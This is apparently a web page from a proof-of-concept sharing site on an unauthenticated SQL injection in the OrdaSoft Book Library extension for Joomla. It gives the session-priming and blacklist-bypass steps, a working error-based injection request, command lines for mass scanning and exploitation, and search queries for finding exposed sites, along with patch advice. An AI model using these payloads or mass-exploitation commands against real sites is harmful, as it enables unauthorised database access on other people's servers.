POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Joomlacritical

CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection

September 29, 2026 · 29 views

OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.

#joomla#ordasoft#sqli#sql-injection#cms#unauthenticated#booklibrary#com_booklibrary#cwe-89#critical

CVE:

CVE-2026-101110

Date:

2026-09-29

Severity:

CRITICAL

Exploit source

PoC code is available to registered members only.

Description

Overview

CVE-2026-101110 affects OrdaSoft Book Library (Free) for Joomla — extension ≤ 6.4.6. Upgrade to 6.4.7+.

| | | |---|---| | Component | com_booklibrary | | File / function | site/booklibrary.php → books() | | Parameters | field, direction (sort) | | Auth | None (public book listings) | | CWE | CWE-89 SQL Injection | | CVSS 4.0 | 9.3 Critical (Joomla CNA) | | Credit | Ala Arfaoui |

Mechanism: books() runs field / direction through protectInjectionWithoutQuote(), which only substring-matches select and then wraps the value in $db->quote() — ineffective when the value is concatenated into an unquoted ORDER BY clause.

Exploitation requires:

  1. Session priming — first request sets default sort (field / direction) in session.
  2. Blacklist bypass — second request appends -- xselect so the filter sees select in the comment tail while the active expression before -- remains executable SQL.
Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

PoC page: https://pocbit.org/pocs/cve-2026-101110

GitHub: murrez/CVE-2026-101110

Bundled tool (Python 3)

Download poc.py from this page (View exploit code).

pip install -r requirements.txt

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt

| Step | PoC behavior | |------|----------------| | Fingerprint | com_booklibrary paths + optional manifest version | | Routes | showCategory, search, showBooks, books, … + scraped catid / Itemid | | check | Prime session → confirm SQLi (flag / VERSION()); --aggressive | | exploit | Prime → error-based extract via --subquery (default SELECT VERSION()) | | mass | --list + -j; exploited.txt on successful leak |

Payload decoy suffix in code: -- xselect (BLACKLIST_DECOY). JSONL includes session_primed.

Example HTTP

Prime (session):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC

Inject (PoC appends decoy):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC

POST variants are attempted when GET fails.

Version detection

/administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → vulnerable; ≥ 6.4.7 → patched.

Related OrdaSoft CVEs (Sep 2026)

| CVE | Extension | Issue | Fixed | |-----|-----------|-------|-------| | CVE-2026-101110 | Book Library | ORDER BY SQLi + blacklist bypass | 6.4.7 | | CVE-2026-101111 | Book Library | Reflected XSS (title) | 6.4.7 | | CVE-2026-101108 | Vehicle Manager | ORDER BY SQLi | 6.5.8 | | CVE-2026-100752 | Real Estate Manager | ORDER BY SQLi | 6.7.9 |

Patch all OrdaSoft components you deploy.

Hunting (examples)

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

Remediation

  1. Upgrade to Book Library 6.4.7+.
  2. Review other OrdaSoft Joomla extensions on the same site.
  3. Monitor com_booklibrary sort parameters until patched.

Legal and ethical use

Authorized testing and patch validation only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →